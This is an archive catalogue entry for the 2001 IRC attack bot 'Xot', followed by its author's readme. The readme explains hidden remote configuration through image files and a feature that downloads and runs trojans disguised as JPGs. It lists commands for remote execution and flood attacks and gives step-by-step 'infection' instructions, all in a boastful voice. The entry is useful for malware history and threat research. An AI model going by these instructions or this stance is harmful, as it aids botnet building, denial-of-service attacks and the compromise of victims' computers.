Xot
Released 23 years, 4 months ago. July 2001
Copyright © MegaSecurity
By XenoZ
Informations
Author | XenoZ |
Family | Xot |
Category | Remote Access |
Version | Xot |
Released Date | Jul 2001, 23 years, 4 months ago. |
Additional Information
Server:
dropped file:
C:\WINDOWS\MTask32.exe
size: 172.111 bytes
startup:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Author Information / Description
__ __ _ ___ ____
\ \/ / ___ | |_ __ __ / _ \ | ___|
\ / / _ \ | __|\ \ / /| | | | |___ \
/ \ | (_) || |_ \ V / | |_| | _ ___) |
/_/\_\ \___/ \__| \_/ \___/ (_)|____/
By: XenoZ
Xot v0.5 Beta 2 By: XenoZ
Well here it is, my first open beta version of my irc bot Xot.
This bot has a ton of goodies for you script kiddies to play with.
But let me warn you Xot is not a friendly channel bot.
Xot is an attack bot and can possibly cause alot of damage if one choosed to do so.
So basically im not to blame if you successfully take down yahoo.com somehow.
Xot has a main feature which i call DRSS (Dynamic Remote Settings Stub).
DRSS is basically important bot settings that are appending at the end
of any file you wish to append it to like a .JPG file or a .GIF file.
This file that has the settings is then uploaded to a webspace you specify
on EditServer and when the server.exe file gets executed on the victem's computer,
Xot downloads the settings file periodically at a set interval
(interval also specified in EditServer) and Xot syncs the settings in.
The major benefits of this feature is that you can change the Irc Server
or Channel which your bots idle on _Very_ easyly.
The DRSS file is configured in the format of ircd.conf
(if you're not familiar with ircd.conf it uses different letter lines like O:lines)
when you enter the DRSS file maker program once you type the letter of
line you want it will show the parameters to that line.
Configuration Lines:
O-lines:
O-lines are the lines that add the userinfo on users that use your bot.
You can have multiple Olines and all parameters for the O-line except for
password are allowed to use wildcards.
Format: O:<host>:<ident>:<nick>:<password>
Example: O:*.home.com:S*X:Xen*:mindrapist
I-lines:
I-lines are the lines that add the botinfo for the irc server that the bot uses,
nickname username realname...
Format: I:<prefix>:<nick>:<ident>:<realname>:<email>:<username>
Example: I:@:XenBot:Xenny:W3 0wn j00:
[email protected]
:Xot
S-lines:
S-lines specify the server, server port and password that the bots will idle on.
If there is no password leave the 3nd parameter blank but keep the colon.. (for parsing reasons)
Format: S:<server>:<port>:<password>
Example: S:irc.lcirc.net:6667:
C-lines:
C-lines specify the channel and channel key the bot uses when it connects to the IRC server.
if there is no key leave the 2nd parameter blank but keep the colon.. (for parsing reasons)
Format: C:<channel>:<key>
Example: C:#mindrape:DrUgScArE
E-lines:
Heres a nifty little feature that Overlord_45 gave me the idea for.
Why not add Client to bot encryption to keep those bot stealers and spyers away?
This line gives the bot encryption of for communication.
the E-line specifys the Encryption key and the name of the dll file on
your webspace which has the Encryption routines.
(I included a DLL and mIRC script in the project for this feature).
Thanks to Overlord_45 for this idea. thanks to say-tan and Quension and
the rest of the RCforge crew for the encryption resources and thanks
to Sarin for the script modifications.
The first parameter is your encryption key and the second parameter is
the name of the dll (submitted in this package) that is in the _SAME_ directory as your DRSS file.
Format: E:<encryption key>:<DLL name>
Example: E:MyPersonalKey:Xot.dll
N-lines:
N-lines give you the chance to submit a nicklist on you're webspace for
the bot to download and use to randomly pick Nickname and Ident. the file
data must have nicknames separated with a comma..
No Line Breaks! ... also there is no need to add numbers at the end of
nick names in the nick list because when the bot randomly chooses a
nickname it tacks on a random 2 digit number at the end.
The First and only parameter is the name of the nicklist on the
_SAME_ webspace directory as your DRSS file. (a sample nicklist has been given in the package)
Format: N:<name list source NOT A URL>
Example: N:nicklist.txt
U-lines:
U-lines give you the chance to upload and run an program unto your bots.
This feature is good Updating your bots or just adding a new trojan onto the computer.
The first parameter is the URL of the file (you can give it any name any extension)
the second parameter is what you want the file to be renamed to on download.
(some webspace providers dont accept EXE files so this feature is
for that reason.. give the exe file a JPG extension and the second parameter changes it back on download) and the third parameter is 1 or 0, 1 being run on download and 0 begin no run on download...
WARNING: make sure the file doesn't melt on execution other wise the bot will keep downloading it
Format: U:<url without http>:<filename on computer>:<1 or 0>
Example: U:my.server.here/server.jpg:server.exe:1
D-lines:
D-lines takes startup info out and shutsdown the bot.
PASSWORD is password on Server.exe for EditServer.exe
IRC Bot commands: (i'm using "!" as an example prefix)
!say <channel/user> <text to say> - makes the bot say something
!op <channel> <user> - makes the bot op someone
!deop <channel> <user> - makes the bot deop someone
!ban <channel> <hostmask> - makes the bot ban someone
!unban <channel> <hostmask> - makes the bot unban someone
!voice <channel> <user > - makes the bot voice someone
!devoice <channel> <user> - makes the bot devoice someone
!notice <channel/user> <text to say> - makes the bot send a notice
!action <channel/user> <text to say> - makes the bot do an action
!ctcp <channel/user> <ctcp command> - makes the bot ctcp someone
!nick <nickname> - makes the bot change its nickname
!raw <raw IRC command> - makes the bot do a RAW irc command
!id - makes the bot display its tag
!sync - makes the bot resync its DRSS file
!login <password> - logs into the bot
!exec <hide or show> <commandline> - executes a commandline
!ping <address> <packetsize> <times> - ICMP attack
!udp <ip> <packet size> <times> - UDP attack
!igmp <address> <packetsize> <times> <interval> - IGMP attack
!clone <server> <port> <# of clones> - clone attack
!cloneraw <raw IRC command> - send a raw IRC command to the clones
!clonekill - kills all clones
!info - gives computer info of the computer that the bot is on
!botinfo - gives bot version and such
Encryption -
This package comes with an mIRC script and a DLL for the encryption routines.. if you want your bot to communicate encrypted add your E:line with the first parameter as the key and the second parameter as the name of the dll file... Xot.dll ... then upload the dll file and upload the new DRSS settings. then in your mIRC client put Xot.ini and Xot.dll in your mIRC folder and do this in mIRC status... :
/load -rs Xot.ini
then get on your channel and right click the channel window and there should be a Xot submenu.. same thing with querys.
NOTE: XOT.INI ONLY WORKS WITH mIRC 5.9+
Editserver.exe -
this is where we configure the SERVER.exe file to reconize the webspace of which the DRSS file is in.
File Location - the exact website url for your DRSS file
Interval in Min - the interval between DRSS updates
Password - password to read EditServer settings
ID tag - add your own little tag to know whos bots they are. or whatever you want in there.
No Read - this just means if on read should the EditServer read the already appended info or just append more info. (advanced) dont use it unless you know what your doing.
DRSS Config -
this is where you make your DRSS file.. you can append it to anything.. but i would use a GIF file because they are small... or you can use a blank txt file... it doesn't matter
the buttons in DRSS config are self explanatory.. in the memobox all you have to do is type out the letter of line you want and the parameter will automatically appear
Steps On Infection...
1. configure your Server.exe via Editserver.exe
2. Make your DRSS file and Upload it to your specified webspace in Editserver
3. Start infecting
Other shit-
Xot Team:
Programmer: XenoZ
Head Beta Tester/ideas for Development : Overlord_45
mIRC Script Creater/ideas/beta tester : Sarin
I just wanna give shoutouts to everyone at LCIRC (irc.lcirc.net), NetbioM, Overlord_45 , Sarin, DataSpy (good luck on your bot), Ritual33, ZenDraL and the rest of the Drugscare Crew (who infected like more than half of the cable IP range =P ) , RaYmAn (thanks for teachin me the raw UDP.. but i used TNMUDP =P ) , SilenceGold, Ganja51, narf, CyberFly, evilgoat and slim (good luck on your bots),Gwen and anyone else i missed.
P.S. This Version Is Dedicated To Rob And Is Released On His Birthday.. Happy Birthday Rob. -XenoZ and NetbioM
Well thats it for the Beta 2 release...
Expect more goodies in Beta 3 =D
-XenoZ
If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.